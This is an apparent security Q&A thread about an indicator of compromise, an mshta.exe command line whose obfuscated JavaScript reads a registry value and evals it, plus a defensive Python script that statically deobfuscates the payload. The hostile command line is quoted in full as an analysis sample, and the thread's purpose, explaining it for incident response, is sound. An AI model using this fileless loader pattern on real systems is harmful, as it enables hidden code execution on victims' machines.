
I have an IOC that has a command-line argument that looks like the one below. I wanted to see if someone could help me parse it out a bit to understand what is happening.

C:\Windows\System32\mshta.exe javascript:GO3sOtu=BN1;Z0y=new%20ActiveXObject(WScript.Shell);Aer53IGv=BY5S;Quaj7=Z0y.RegRead(HKCU\\software\\najpigann\\hspi);RDYKO79Ji=0xq;eval(Quaj7);YWy5A0Za=Fl2JV;
rschapman

1 Answer


mshta.exe parses web code to run.

If you take the Javascript and run it through a beautifier:

GO3sOtu = BN1;
Z0y = new ActiveXObject(WScript.Shell);
Aer53IGv = BY5S;
Quaj7 = Z0y.RegRead(HKCU\\software\\najpigann\\hspi);
RDYKO79Ji = 0xq;
eval(Quaj7);
YWy5A0Za = Fl2JV;

At this point, it's simple to piece together the code flow:

eval(new ActiveXObject(WScript.Shell).RegRead(HKCU\software\najpigann\hspi))
schroeder
  • I understood the javascript was being passed and understood that mshta was parsing that. What I wasn't following are the items you listed and what they were doing. For example what is going on with the `GO3sOtu = BN1;` piece? That's what I was wanting to understand. I see the pieces that led to the item you put together. Is the rest just garbage? – rschapman Jul 11 '17 at 16:02
  • When posting, make sure you include the scope of the question, like the parts you understand and the parts you don't – schroeder Jul 11 '17 at 20:10
  • From a Javascript perspective, they do nothing. Either the IOC does not include all the other code (most likely), or it's included to try to evade detection. – schroeder Jul 11 '17 at 20:12
  • Noted on the question etiquette. Thanks for your help. – rschapman Jul 12 '17 at 02:17
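The manual steps in the answer (beautify, notice the assignments nothing ever reads, collapse the live chain into the eval call) can be mechanised for triage. The script below is an added example and not code from the question, the answer or any tool named on this page. It uses the command line from the question as a constructed sample, URL-decodes the `javascript:` payload, splits it into statements, lists variables that are assigned but never read (the junk the comments ask about), inlines the live assignments so the eval chain reads the way the answer wrote it, and pulls out any `RegRead` registry paths so a responder knows where the next stage was stored. It is a heuristic tokenizer, not a JavaScript parser, and it never executes anything; the function and variable names are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample: the mshta command line from the question, copied as posted.
SAMPLE_CMDLINE = (
    r"C:\Windows\System32\mshta.exe javascript:GO3sOtu=BN1;"
    r"Z0y=new%20ActiveXObject(WScript.Shell);Aer53IGv=BY5S;"
    r"Quaj7=Z0y.RegRead(HKCU\\software\\najpigann\\hspi);"
    r"RDYKO79Ji=0xq;eval(Quaj7);YWy5A0Za=Fl2JV;"
)

IDENT = r"[A-Za-z_][A-Za-z0-9_]*"
IDENT_RE = re.compile(rf"\b{IDENT}")                      # \b keeps "0xq" from yielding "xq"
ASSIGN_RE = re.compile(rf"^({IDENT})\s*=(?!=)\s*(.+)$", re.DOTALL)
REGREAD_RE = re.compile(r"\.RegRead\(\s*([^)]*?)\s*\)")


def extract_javascript(cmdline):
    """Return the URL-decoded script after 'javascript:' in an mshta command line, or None."""
    m = re.search(r"javascript:(.*)$", cmdline, re.IGNORECASE | re.DOTALL)
    return unquote(m.group(1)) if m else None


def split_statements(js):
    """Split a one-line script on ';' at parenthesis depth 0. Deliberately not a full JS parser."""
    stmts, buf, depth = [], [], 0
    for ch in js:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == ";" and depth == 0:
            stmts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    stmts.append("".join(buf).strip())
    return [s for s in stmts if s]


def resolve(expr, assigned, depth=0):
    """Inline every variable in expr that was assigned earlier, so the data flow reads straight."""
    if depth > 10:  # guard against self-referential junk such as a=a
        return expr

    def sub(m):
        name = m.group(0)
        return resolve(assigned[name], assigned, depth + 1) if name in assigned else name

    return IDENT_RE.sub(sub, expr)


def analyse(cmdline):
    """Static triage of an mshta javascript: payload. Returns None if there is no javascript: payload."""
    js = extract_javascript(cmdline)
    if js is None:
        return None
    stmts = split_statements(js)

    # Pass 1: which names are assigned, and how often is each one read anywhere else?
    assigned, reads = {}, {}
    for s in stmts:
        m = ASSIGN_RE.match(s)
        body = m.group(2) if m else s
        if m:
            assigned.setdefault(m.group(1), m.group(2))
        for name in IDENT_RE.findall(body):
            reads[name] = reads.get(name, 0) + 1
    dead_stores = [v for v in assigned if reads.get(v, 0) == 0]

    # Pass 2: walk in order, collapsing each eval(...) through the assignments live at that point.
    live, resolved_evals = {}, []
    for s in stmts:
        m = ASSIGN_RE.match(s)
        if m:
            live[m.group(1)] = m.group(2)
        elif s.startswith("eval("):
            resolved_evals.append(resolve(s, live))

    registry_paths = set()
    for text in resolved_evals + list(assigned.values()):
        registry_paths.update(REGREAD_RE.findall(text))

    return {
        "statements": stmts,
        "dead_stores": dead_stores,            # junk assignments: assigned, never read
        "resolved_evals": resolved_evals,      # the real control flow, one line per eval
        "registry_paths": sorted(registry_paths),  # where the next stage was stored
        "uses_activex": "ActiveXObject" in js,
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_CMDLINE)
    print("dead stores   :", ", ".join(report["dead_stores"]))
    print("resolved eval :", *report["resolved_evals"], sep="\n  ")
    print("registry paths:", *report["registry_paths"], sep="\n  ")
```

On the sample the dead-store list is exactly the four assignments the comments call garbage, the resolved eval line matches the one-liner in the answer, and the registry path is the artifact worth collecting from the host, since the payload that mshta finally runs lives in that registry value rather than on disk.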